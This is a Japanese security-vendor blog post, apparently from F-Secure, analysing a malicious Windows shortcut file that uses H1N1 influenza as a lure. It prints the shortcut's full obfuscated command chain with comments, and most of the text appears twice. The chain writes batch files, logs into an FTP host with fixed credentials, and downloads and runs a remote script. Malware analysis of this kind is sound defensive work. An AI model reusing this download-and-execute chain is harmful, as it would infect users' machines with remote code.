我々は「H1N1」新型インフルエンザをエサにした、新たなマルウェアと遭遇した。
これはショートカット・ファイルで、.LNKに名称変更されたWindows EXE実行ファイルではなく、実際のリンクファイルだ。
以下が、このファイルの外観だ(md5: d17e956522f83995654666c0f2343797)。
コマンドプロンプトからこのファイルを見ると、1987バイトの無害なショートカットに見える。
しかしコンテンツを見ると、何だかおかしな様子なのが分かるだろう:
このショートカットのプロパティを見てみよう:
これは「%ComSpec%」にリンクしているのだろうか? あまり良い感じはしない。このショートカットのリンク先をコピー&ペーストしてみよう:
よく分からない。
では、何をしているかを見るため、これをより小さな部分に分割してみよう:
%ComSpec% /c // Executes command prompt to run the next commands
set h=p - // sets variable "h" as "p ?"
set j=ge // Sets variable "j" as "ge"
set s=.g03z. // sets variable "s" as ".g03z."
echo echo o www%s%com^>t>b.bat // writes "echo o www%s%com>t" to b.bat - that's "www.g03z.com"
call b.bat // calls the newly created b.bat
echo aa33>>t // writes "aa33" to file called t
echo bb33>>t // writes "bb33" to file called t
echo echo %j%t p p.vbs^>^>t>>c // writes "echo %j%t p p.vbs>>t" to file called c - that's "get"
echo echo bye^>^>t>>c // writes "echo bye>>t" to file called c
echo ft%h%s:t>>c // writes "ft%h%s:t" to file called c - that's "ftp"
echo start p.vbs>>c // writes "start p.vbs" to file called c
ren c h.bat // renames c to h.bat
call h.bat // calls h.bat
このショートカットをクリックすると、結果として、あなたのマシンは以下のことをすることになる:
では、「g03z.com」のオーナーは誰だろう? なるほど、ミスター「Zzzzggg」というわけだ:
同ドメインはまだ存在するが、ファイル「p.vbs」は現在サーバに見あたらない。よって現状では何ごとも起こらない。
エフセキュアの製品はこの悪意あるショートカットを検出し、ブロックしている。
これはショートカット・ファイルで、.LNKに名称変更されたWindows EXE実行ファイルではなく、実際のリンクファイルだ。
以下が、このファイルの外観だ(md5: d17e956522f83995654666c0f2343797)。
コマンドプロンプトからこのファイルを見ると、1987バイトの無害なショートカットに見える。
しかしコンテンツを見ると、何だかおかしな様子なのが分かるだろう:
このショートカットのプロパティを見てみよう:
これは「%ComSpec%」にリンクしているのだろうか? あまり良い感じはしない。このショートカットのリンク先をコピー&ペーストしてみよう:
よく分からない。
では、何をしているかを見るため、これをより小さな部分に分割してみよう:
%ComSpec% /c // Executes command prompt to run the next commands
set h=p - // sets variable "h" as "p ?"
set j=ge // Sets variable "j" as "ge"
set s=.g03z. // sets variable "s" as ".g03z."
echo echo o www%s%com^>t>b.bat // writes "echo o www%s%com>t" to b.bat - that's "www.g03z.com"
call b.bat // calls the newly created b.bat
echo aa33>>t // writes "aa33" to file called t
echo bb33>>t // writes "bb33" to file called t
echo echo %j%t p p.vbs^>^>t>>c // writes "echo %j%t p p.vbs>>t" to file called c - that's "get"
echo echo bye^>^>t>>c // writes "echo bye>>t" to file called c
echo ft%h%s:t>>c // writes "ft%h%s:t" to file called c - that's "ftp"
echo start p.vbs>>c // writes "start p.vbs" to file called c
ren c h.bat // renames c to h.bat
call h.bat // calls h.bat
このショートカットをクリックすると、結果として、あなたのマシンは以下のことをすることになる:
- 「www.g03z.com」という名称のFTPサイトに接続
- ユーザー名「aa33」、パスワード「bb33」でログイン
- 「p.vbs」という名称のスクリプトをダウンロード
- スクリプトを実行
では、「g03z.com」のオーナーは誰だろう? なるほど、ミスター「Zzzzggg」というわけだ:
同ドメインはまだ存在するが、ファイル「p.vbs」は現在サーバに見あたらない。よって現状では何ごとも起こらない。
エフセキュアの製品はこの悪意あるショートカットを検出し、ブロックしている。
